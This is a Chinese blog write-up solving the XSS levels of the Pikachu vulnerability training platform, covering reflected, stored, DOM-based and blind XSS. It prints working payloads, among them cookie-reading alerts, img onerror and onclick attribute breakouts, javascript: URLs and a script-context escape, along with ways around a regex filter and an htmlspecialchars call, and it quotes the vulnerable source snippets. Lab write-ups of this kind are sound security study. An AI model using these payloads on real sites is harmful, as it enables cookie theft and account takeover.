美文网首页
Pikachu漏洞平台---XSS(Cross-Site Scr

Pikachu漏洞平台---XSS(Cross-Site Scr

作者: l0st | 来源:发表于2018-11-05 18:23 被阅读0次

Pikachu Vul

XSS

1.反射型XSS(get)
随便输入,可以发现没有任何过滤,只是限制了输入字符的长度,F12修改一下即可

2.反射型XSS(post)
可以看到是一个用户登陆窗口,username和pwd都不知道,看看提示:

为了能够让你练习xss获取cookie,我们还是登陆一下,账号admin/123456
登上去以后发现还是没有任何过滤,直接构造payload:


<script>alert(document.cookie)</script>

3.存储型xss
没过滤,直接搞

4.DOM型XSS
初步观察,点击 click me! 后会出现 what do you see? 的链接按钮,其指向是 当前目录/you_input 审查元素时发现onclick后会执行函数 domxss() ,其作用是读取input的值并将其拼接到新创建的link节点中,源码如下:


                    function domxss(){
                        var str = document.getElementById("text").value;
                        document.getElementById("dom").innerHTML = "<a href='"+str+"'>what do you see?</a>";
                    }
                    //试试:'><img src="#" onmouseover="alert('xss')">
                    //试试:' onclick="alert('xss')">,闭合掉就行

5.DOM型xss-s
和4同理,直接搞

6.xss之盲打
没有任何过滤,提交以后访问 /admin.php 用户名admin,密码123456,打开就弹窗。。。

7.xss之过滤
说是有过滤,随便输测试一下:

<h1>im a lil horny.</h1>

成功了,
试试

<script>alert(/xss/)</script>

可以看到被过滤了,换个轮子:

<img src=0 onerror="alert(document.cookie)">

成功弹窗了...看下过滤语句:

$message=preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/', '', $_GET['message']); //使用正则将 <script 替换为空

8.xss之htmlspecialchars
审查元素后发现输入的内容是被拼接在<a href ="输入的内容">中
故构造:

"><img src=0 onerror="alert(/xss/)">

没有作用,经过了过滤。
看下源码:

$message=htmlspecialchars($_GET['message'])

这里就要说htmlspecialchars这个函数的作用了:

htmlspecialchars(string,flags,character-set,double_encode)

该函数把预定义的字符转换为 HTML 实体
预定义的字符是 & " ' < > 这五个,即转化为 &#xxx的形式
关于flags:默认情况下为只过滤双引号,若设置为ENT_QUOTES则单双引号均被过滤
明白了htmlspecial的作用,可以看到本题中未过滤单引号,故输入 'gggg'gggg'
返回的DOM为

<a href="" ggg'ggg''="">'ggg'ggg'</a>     
<!--可以看到最前面的'被当作"闭合了href属性,语句中和语句后的单引号没有受到影响-->
<!--后来才知道输入的单引号没有被过滤的话,经过htmlspecialchars后拼接到html语句中会自动换成双引号-->

现在可以开始造轮子:

' onclick='alert(document.cookie)'

成功弹出Cookie,再次审查元素拼接我们输入之后的HTML:

<a href="" onclick="alert(document.cookie)" '="">' onclick='alert(document.cookie)'</a>

9.xss之href输出
测试:

' onclick='alert(/xss/)'

审查返回的元素发现所有字符都被转化为HTML实体了,包括单引号。
但由于输入的url拼接在 <a href='输入的内容'>属性中,可以使用javascript语法来造轮子:

Javascript:alert(document.cookie)

如果没有限制的话可以用来执行远程JS

10.xss之js输出
测试输入 <123> 审查元素可以发现如下代码:

<script>
    $ms='<123>';
    if($ms.length != 0){
        if($ms == 'tmac'){
            $('#fromjs').text('tmac确实厉害,看那小眼神..')
        }else {
//            alert($ms);
            $('#fromjs').text('无论如何不要放弃心中所爱..')
        }

    }
</script>

输入被拼接到了脚本中,尝试闭合语句然后添加自己的语句上去:

';alert(document.cookie)//

成功弹出cookie

这里将输入动态的生成到了js中,形成xss,javascript里面是不会对tag和字符实体进行解释的.

相关文章

  • Pikachu漏洞平台---XSS(Cross-Site Scr

    Pikachu Vul XSS 1.反射型XSS(get)随便输入,可以发现没有任何过滤,只是限制了输入字符的长度...

  • XSS && CSRF 攻击

    XSS 攻击 XSS (Cross-Site Scripting,跨站脚本攻击)是一种常见的web安全漏洞,它允许...

  • XSS系列之3种类型

    一、概述 Cross-site scripting,简称XSS,跨站脚本攻击。XSS是一种网站应用程序的安全漏洞攻...

  • XSS AND CSRF

    XSS:(cross-site script)跨站脚本 XSS是一种网站应用程序的安全漏洞攻击。恶意用户将代码注入...

  • XSS与CSRF的区别

    定义一 XSS:跨站脚本(Cross-site scripting,通常简称为XSS)是一种网站应用程序的安全漏洞...

  • XSS & CSRF

    What is XSS Attach, How to prevent it? XSS is Cross-Site ...

  • XSS 与 CSRF 区别

    XSS(Cross-site scripting,跨站脚本),恶意用户利用网站漏洞,将代码注入到网页上,其他用户在...

  • 你所了解到的Web攻击技术:

    1.XSS(Cross-Site Scripting,跨站脚本攻击):指通过存在安全漏洞的Web网站注册用户的浏览...

  • web的攻击技术

    因输出值转义不完全引发的安全漏洞 跨站脚本攻击(Cross-Site Scripting ,XSS) 是指通过存在...

  • 代码审计——xss漏洞

    XSS漏洞大致分为三种 反射型XSS漏洞 存储型XSS漏洞 基于DOM的XSS漏洞 反射型XSS漏洞 它通过给别人...

网友评论

      本文标题:Pikachu漏洞平台---XSS(Cross-Site Scr

      本文链接:https://www.haomeiwen.com/subject/uqhjxqtx.html